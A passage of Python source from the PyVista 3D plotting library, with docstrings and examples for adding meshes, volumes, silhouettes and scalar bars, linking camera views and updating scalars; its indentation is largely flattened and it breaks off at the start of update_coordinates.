>>> vertices = np.array([[0, 0, 0], [1, 0, 0], [.5, .667, 0], [0.5, .33, 0.667]])
>>> faces = np.hstack([[3, 0, 1, 2], [3, 0, 3, 2], [3, 0, 1, 3], [3, 1, 2, 3]])
>>> mesh = pyvista.PolyData(vertices, faces)
>>> mesh.cell_data['colors'] = [[255, 255, 255],
... [0, 255, 0],
... [0, 0, 255],
... [255, 0, 0]]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
... rgb=True, preference='cell')
>>> plotter.camera_position='xy'
>>> plotter.show()
        Note how this varies from the ``preference='cell'`` plot
        above. With ``preference='point'`` each point is individually
        colored, whereas with ``preference='cell'`` each cell face is
        individually colored.
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False,
... rgb=True, preference='point')
>>> plotter.camera_position='xy'
>>> plotter.show()
Plot a plane with a constant color and vary its opacity by point.
>>> plane = pyvista.Plane()
>>> plane.plot(color='b', opacity=np.linspace(0, 1, plane.n_points),
... show_edges=True)
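        Plot a sphere using physically based rendering; the
        ``metallic`` and ``roughness`` values here are illustrative only.
        >>> plotter = pyvista.Plotter()
        >>> _ = plotter.add_mesh(pyvista.Sphere(), pbr=True,
        ...                      metallic=0.9, roughness=0.4, color='grey')
        >>> plotter.show()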
"""
self.mapper = make_mapper(_vtk.vtkDataSetMapper)
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError(
f'Object type ({type(mesh)}) not supported for plotting in PyVista.'
)
##### Parse arguments to be used for all meshes #####
# Avoid mutating input
if scalar_bar_args is None:
scalar_bar_args = {'n_colors': n_colors}
else:
scalar_bar_args = scalar_bar_args.copy()
if show_edges is None:
show_edges = self._theme.show_edges
if show_scalar_bar is None:
show_scalar_bar = self._theme.show_scalar_bar
if lighting is None:
lighting = self._theme.lighting
if smooth_shading is None:
if pbr:
smooth_shading = True
else:
smooth_shading = self._theme.smooth_shading
# supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if render_points_as_spheres is None:
render_points_as_spheres = self._theme.render_points_as_spheres
if name is None:
name = f'{type(mesh).__name__}({mesh.memory_address})'
nan_color = Color(
nan_color, default_opacity=nan_opacity, default_color=self._theme.nan_color
)
if color is True:
color = self._theme.color
if texture is False:
texture = None
if culling is True:
culling = 'backface'
rgb = kwargs.pop('rgba', rgb)
feature_angle = kwargs.pop('feature_angle', 30)
# account for legacy behavior
if 'stitle' in kwargs: # pragma: no cover
warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning)
scalar_bar_args.setdefault('title', kwargs.pop('stitle'))
if "scalar" in kwargs:
raise TypeError(
"`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?"
)
assert_empty_kwargs(**kwargs)
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
# first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalars specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise TypeError(
'scalars array must be given as a string name for multiblock datasets.'
)
the_arguments = locals()
the_arguments.pop('self')
the_arguments.pop('mesh')
the_arguments.pop('kwargs')
if multi_colors:
# Compute unique colors for each index of the block
if _has_matplotlib():
from itertools import cycle
import matplotlib
cycler = matplotlib.rcParams['axes.prop_cycle']
colors = cycle(cycler)
else:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
                    if not is_pyvista_dataset(data):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, _vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
if silhouette:
if isinstance(silhouette, dict):
self.add_silhouette(mesh, silhouette)
else:
self.add_silhouette(mesh)
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalars components are not vectors/tuples
scalars = mesh.active_scalars_name
# Don't allow plotting of string arrays by default
if scalars is not None: # and np.issubdtype(mesh.active_scalars.dtype, np.number):
scalar_bar_args.setdefault('title', scalars)
else:
scalars = None
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
# enable rgb if the scalars name ends with rgb or rgba
if rgb is None:
if scalars.endswith('_rgb') or scalars.endswith('_rgba'):
rgb = True
original_scalar_name = scalars
scalars = get_array(mesh, scalars, preference=preference, err=True)
scalar_bar_args.setdefault('title', original_scalar_name)
# Compute surface normals if using smooth shading
if smooth_shading:
mesh, scalars = prepare_smooth_shading(
mesh, scalars, texture, split_sharp_edges, feature_angle, preference
)
if mesh.n_points < 1:
raise ValueError('Empty meshes cannot be plotted. Input mesh has zero points.')
# set main values
self.mesh = mesh
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor = _vtk.vtkActor()
prop = _vtk.vtkProperty()
actor.SetMapper(self.mapper)
actor.SetProperty(prop)
if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (_vtk.vtkTexture, _vtk.vtkOpenGLTexture)):
raise TypeError(f'Invalid texture type ({type(texture)})')
if mesh.GetPointData().GetTCoords() is None:
raise ValueError(
'Input mesh does not have texture coordinates to support the texture.'
)
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# see https://github.com/pyvista/pyvista/issues/950
mesh.set_active_scalars(None)
# Handle making opacity array
custom_opac, opacity = process_opacity(
mesh, opacity, preference, n_colors, scalars, use_transparency
)
# Scalars formatting ==================================================
if scalars is not None:
show_scalar_bar, n_colors, clim = self.mapper.set_scalars(
mesh,
scalars,
scalar_bar_args,
rgb,
component,
preference,
interpolate_before_map,
custom_opac,
annotations,
log_scale,
nan_color,
above_color,
below_color,
cmap,
flip_scalars,
opacity,
categories,
n_colors,
clim,
self._theme,
show_scalar_bar,
)
elif custom_opac: # no scalars but custom opacity
self.mapper.set_custom_opacity(
opacity,
color,
mesh,
n_colors,
preference,
interpolate_before_map,
rgb,
self._theme,
)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = self._theme.outline_color
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise ValueError(
'Invalid style. Must be one of the following:\n'
'\t"surface"\n'
'\t"wireframe"\n'
'\t"points"\n'
)
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if pbr:
if not _vtk.VTK9: # pragma: no cover
                raise RuntimeError('Physically based rendering requires VTK 9 or newer')
prop.SetInterpolationToPBR()
prop.SetMetallic(metallic)
prop.SetRoughness(roughness)
elif smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = Color(color, default_color=self._theme.color)
prop.SetColor(rgb_color.float_rgb)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(Color(edge_color, default_color=self._theme.edge_color).float_rgb)
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
geom = pyvista.Triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = Color('black')
geom.points -= geom.center
addr = actor.GetAddressAsString("")
self.renderer._labels[addr] = [geom, label, rgb_color]
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
self.add_actor(
actor,
reset_camera=reset_camera,
name=name,
culling=culling,
pickable=pickable,
render=render,
)
# hide scalar bar if using special scalars
if scalar_bar_args.get('title') == '__custom_rgba':
show_scalar_bar = False
# Only show scalar bar if there are scalars
if show_scalar_bar and scalars is not None:
self.add_scalar_bar(**scalar_bar_args)
self.renderer.Modified()
return actor
def add_volume(
self,
volume,
scalars=None,
clim=None,
resolution=None,
opacity='linear',
n_colors=256,
cmap=None,
flip_scalars=False,
reset_camera=None,
name=None,
ambient=0.0,
categories=False,
culling=False,
multi_colors=False,
blending='composite',
mapper=None,
scalar_bar_args=None,
show_scalar_bar=None,
annotations=None,
pickable=True,
preference="point",
opacity_unit_distance=None,
shade=False,
diffuse=0.7,
specular=0.2,
specular_power=10.0,
render=True,
**kwargs,
):
"""Add a volume, rendered using a smart mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UniformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If ``scalars`` is
``None``, then the active scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
resolution : list, optional
Block resolution.
opacity : str or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalars range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custom made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
cmap : str, optional
            Name of the Matplotlib colormap to use when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene.
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
            When lighting is enabled, this is the amount of light from
            0 to 1 that reaches the actor independent of its orientation
            toward the light source. Default 0.0.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
multi_colors : bool, optional
            Whether or not to use multiple colors when plotting MultiBlock
            objects. Blocks will be colored sequentially by cycling through
            ``'Reds'``, ``'Greens'``, ``'Blues'``, ``'Greys'``, ``'Oranges'``
            and ``'Purples'``.
blending : str, optional
            Blending mode for visualization of the input object(s). Can be
            one of 'additive', 'maximum', 'minimum', 'composite', or
            'average'. Defaults to 'composite'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and
``'smart'``. If ``None`` the ``"volume_mapper"`` in the
``self._theme`` is used.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the
scalar bar to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If ``False``, a scalar bar will not be added to the
scene. Defaults to ``True``.
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float
values in the scalars range to annotate on the scalar bar
            and the values are the string annotations.
pickable : bool, optional
Set whether this mesh is pickable.
preference : str, optional
When ``mesh.n_points == mesh.n_cells`` and setting
scalars, this parameter sets how the scalars will be
            mapped to the mesh. Default ``'points'``, which causes
            the scalars to be associated with the mesh points. Can
            be either ``'points'`` or ``'cells'``.
opacity_unit_distance : float
Set/Get the unit distance on which the scalar opacity
transfer function is defined. Meaning that over that
distance, a given opacity (from the transfer function) is
accumulated. This is adjusted for the actual sampling
distance during rendering. By default, this is the length
of the diagonal of the bounding box of the volume divided
by the dimensions.
shade : bool
Default off. If shading is turned on, the mapper may
perform shading calculations - in some cases shading does
not apply (for example, in a maximum intensity projection)
and therefore shading will not be performed even if this
flag is on.
        diffuse : float, optional
            The diffuse lighting coefficient. Default ``0.7``.
        specular : float, optional
            The specular lighting coefficient. Default ``0.2``.
        specular_power : float, optional
            The specular power. Between ``0.0`` and ``128.0``.
            Default ``10.0``.
render : bool, optional
Force a render when True. Default ``True``.
**kwargs : dict, optional
Optional keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the volume.
Examples
--------
Show a built-in volume example with the coolwarm colormap.
>>> from pyvista import examples
>>> import pyvista as pv
>>> bolt_nut = examples.download_bolt_nut()
>>> pl = pv.Plotter()
>>> _ = pl.add_volume(bolt_nut, cmap="coolwarm")
>>> pl.show()
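        The named opacity transfer functions above can be passed as
        strings; a sketch reversing the mapping with ``'linear_r'``.
        >>> pl = pv.Plotter()
        >>> _ = pl.add_volume(bolt_nut, cmap="coolwarm", opacity="linear_r")
        >>> pl.show()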
"""
# Handle default arguments
# Supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if "scalar" in kwargs:
raise TypeError(
"`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?"
)
assert_empty_kwargs(**kwargs)
# Avoid mutating input
if scalar_bar_args is None:
scalar_bar_args = {}
else:
scalar_bar_args = scalar_bar_args.copy()
# account for legacy behavior
if 'stitle' in kwargs: # pragma: no cover
warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning)
scalar_bar_args.setdefault('title', kwargs.pop('stitle'))
if show_scalar_bar is None:
show_scalar_bar = self._theme.show_scalar_bar
if culling is True:
culling = 'backface'
if mapper is None:
mapper = self._theme.volume_mapper
# only render when the plotter has already been shown
if render is None:
render = not self._first_time
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1, 1, 1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError(
f'Object type ({type(volume)}) not supported for plotting in PyVista.'
)
else:
# HACK: Make a copy so the original object is not altered.
# Also, place all data on the nodes as issues arise when
# volume rendering on the cells.
volume = volume.cell_data_to_point_data()
if name is None:
name = f'{type(volume).__name__}({volume.memory_address})'
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(
block,
resolution=block_resolution,
opacity=opacity,
n_colors=n_colors,
cmap=color,
flip_scalars=flip_scalars,
reset_camera=reset_camera,
name=next_name,
ambient=ambient,
categories=categories,
culling=culling,
clim=clim,
mapper=mapper,
pickable=pickable,
opacity_unit_distance=opacity_unit_distance,
shade=shade,
diffuse=diffuse,
specular=specular,
specular_power=specular_power,
render=render,
)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError(
f'Type {type(volume)} not supported for volume rendering at this time. Use `pyvista.UniformGrid`.'
)
if opacity_unit_distance is None:
opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1)
if scalars is None:
# Make sure scalars components are not vectors/tuples
scalars = volume.active_scalars
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
scalar_bar_args.setdefault('title', volume.active_scalars_info[1])
else:
raise ValueError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data'
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars, preference=preference, err=True)
scalar_bar_args.setdefault('title', title)
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool_ or scalars.dtype == np.uint8:
scalars = scalars.astype(np.float_)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point': _vtk.vtkFixedPointVolumeRayCastMapper,
'gpu': _vtk.vtkGPUVolumeRayCastMapper,
'open_gl': _vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart': _vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise TypeError(
f"Mapper ({mapper}) unknown. Available volume mappers include: {', '.join(mappers.keys())}"
)
self.mapper = make_mapper(mappers[mapper])
# Scalars interpolation approach
if scalars.shape[0] == volume.n_points:
volume.point_data.set_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume.cell_data.set_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
scalars = scalars.astype(np.float_)
with np.errstate(invalid='ignore'):
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = clim[0]
scalars[idxs1] = clim[1]
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = _vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # Set default map if matplotlib is available
if _has_matplotlib():
cmap = self._theme.cmap
if cmap is not None:
if not _has_matplotlib():
raise ImportError('Please install matplotlib for volume rendering.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = _vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = _vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:, 3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(_vtk.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError(
f'Blending mode {blending!r} invalid. '
                'Please choose one of "additive", "composite", '
                '"average", "minimum" or "maximum".'
)
self.mapper.Update()
self.volume = _vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = _vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
prop.SetScalarOpacityUnitDistance(opacity_unit_distance)
prop.SetShade(shade)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(
self.volume,
reset_camera=reset_camera,
name=name,
culling=culling,
pickable=pickable,
render=render,
)
# Add scalar bar if scalars are available
if show_scalar_bar and scalars is not None:
self.add_scalar_bar(**scalar_bar_args)
self.renderer.Modified()
return actor
def add_silhouette(self, mesh, params=None):
"""Add a silhouette of a PyVista or VTK dataset to the scene.
A silhouette can also be generated directly in
:func:`add_mesh <pyvista.Plotter.add_mesh>`. See also
:ref:`silhouette_example`.
Parameters
----------
mesh : pyvista.PolyData
Mesh for generating silhouette to plot.
params : dict, optional
* If not supplied, the default theme values will be used.
* ``color``: ``color_like``, color of the silhouette
* ``line_width``: ``float``, edge width
* ``opacity``: ``float`` between 0 and 1, edge transparency
* ``feature_angle``: If a ``float``, display sharp edges
exceeding that angle in degrees.
* ``decimate``: ``float`` between 0 and 1, level of decimation
Returns
-------
vtk.vtkActor
VTK actor of the silhouette.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> bunny = examples.download_bunny()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(bunny, color='tan')
>>> _ = plotter.add_silhouette(bunny,
... params={'color': 'red', 'line_width': 8.0})
>>> plotter.view_xy()
>>> plotter.show()
"""
silhouette_params = self._theme.silhouette.to_dict()
if params:
silhouette_params.update(params)
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not isinstance(mesh, pyvista.PolyData):
raise TypeError(f"Expected type is `PolyData` but {type(mesh)} was given.")
if isinstance(silhouette_params["decimate"], float):
silhouette_mesh = mesh.decimate(silhouette_params["decimate"])
else:
silhouette_mesh = mesh
alg = _vtk.vtkPolyDataSilhouette()
alg.SetInputData(silhouette_mesh)
alg.SetCamera(self.renderer.camera)
if silhouette_params["feature_angle"] is not None:
alg.SetEnableFeatureAngle(True)
alg.SetFeatureAngle(silhouette_params["feature_angle"])
else:
alg.SetEnableFeatureAngle(False)
mapper = make_mapper(_vtk.vtkDataSetMapper)
mapper.SetInputConnection(alg.GetOutputPort())
actor, prop = self.add_actor(mapper)
prop.SetColor(Color(silhouette_params["color"]).float_rgb)
prop.SetOpacity(silhouette_params["opacity"])
prop.SetLineWidth(silhouette_params["line_width"])
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
clim : sequence
The new range of scalar bar. Two item list (e.g. ``[-1, 2]``).
name : str, optional
The title of the scalar bar to update.
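        Examples
        --------
        A sketch of narrowing an existing scalar bar's range; the array
        name ``'z'`` doubles as the bar title here.
        >>> import pyvista
        >>> sphere = pyvista.Sphere()
        >>> sphere['z'] = sphere.points[:, 2]
        >>> pl = pyvista.Plotter()
        >>> _ = pl.add_mesh(sphere, scalars='z')
        >>> pl.update_scalar_bar_range([-0.25, 0.25], name='z')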
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise AttributeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
            raise KeyError(f'Name ({name}) not valid/not found in this plotter.')
return
def clear(self):
"""Clear plot by removing all actors and properties.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.clear()
>>> plotter.renderer.actors
{}
"""
self.renderers.clear()
self.scalar_bars.clear()
self.mesh = None
def link_views(self, views=0):
"""Link the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
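        Examples
        --------
        A sketch linking the cameras of a two-view plotter to view 0:
        >>> import pyvista
        >>> pl = pyvista.Plotter(shape=(1, 2))
        >>> pl.subplot(0, 0)
        >>> _ = pl.add_mesh(pyvista.Sphere())
        >>> pl.subplot(0, 1)
        >>> _ = pl.add_mesh(pyvista.Cube())
        >>> pl.link_views()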
"""
if isinstance(views, (int, np.integer)):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
return
views = np.asarray(views)
if np.issubdtype(views.dtype, np.integer):
for view_index in views:
self.renderers[view_index].camera = self.renderers[views[0]].camera
else:
            raise TypeError(f'Expected type is int, list or tuple: {type(views)} was given.')
def unlink_views(self, views=None):
"""Unlink the views' cameras.
Parameters
----------
views : None, int, tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
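Examples
--------
Unlink all previously linked views (an illustrative sketch; see
``link_views``).
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(1, 2))
>>> plotter.link_views()
>>> plotter.unlink_views()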
"""
if views is None:
for renderer in self.renderers:
renderer.camera = Camera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = Camera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.abc.Iterable):
for view_index in views:
self.renderers[view_index].camera = Camera()
self.renderers[view_index].reset_camera()
else:
raise TypeError(f'Expected type is None, int, list or tuple: {type(views)} is given')
@wraps(ScalarBars.add_scalar_bar)
def add_scalar_bar(self, *args, **kwargs):
"""Wrap for ``ScalarBars.add_scalar_bar``."""
# only render when the plotter has already been shown
render = kwargs.get('render', None)
if render is None:
kwargs['render'] = not self._first_time
# check if a mapper exists
mapper = kwargs.get('mapper', None)
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise AttributeError('Mapper does not exist. Add a mesh with scalars first.')
kwargs['mapper'] = self.mapper
# title can be the first and only arg
if len(args):
title = args[0]
else:
title = kwargs.get('title', '')
if title is None:
title = ''
kwargs['title'] = title
interactive = kwargs.get('interactive', None)
if interactive is None:
interactive = self._theme.interactive
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
raise ValueError('Interactive scalar bars disabled for multi-renderer plots')
# by default, use the plotter local theme
kwargs.setdefault('theme', self._theme)
return self.scalar_bars.add_scalar_bar(**kwargs)
def update_scalars(self, scalars, mesh=None, render=True):
"""Update scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Force a render when True. Default ``True``.
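Examples
--------
Replace the active scalars with random values (an illustrative
sketch; assumes the mesh was added with scalars).
>>> import numpy as np
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['z'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere, scalars='z')
>>> plotter.update_scalars(np.random.random(sphere.n_points), render=False)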
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.abc.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.render()
return
if isinstance(scalars, str):
# Grab scalars array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise ValueError('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalars array is modified by this function...
mesh.GetPoints().Modified()
except AttributeError:
pass
if render:
self.render()
def update_coordinates(self, points, mesh=None, render=True):
"""Update the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Force a render when True. Default ``True``.
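Examples
--------
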